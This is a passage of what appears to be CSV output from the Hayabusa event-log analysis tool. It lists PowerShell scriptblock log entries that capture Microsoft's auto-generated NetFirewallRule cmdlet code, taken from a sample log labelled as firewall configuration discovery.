'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { 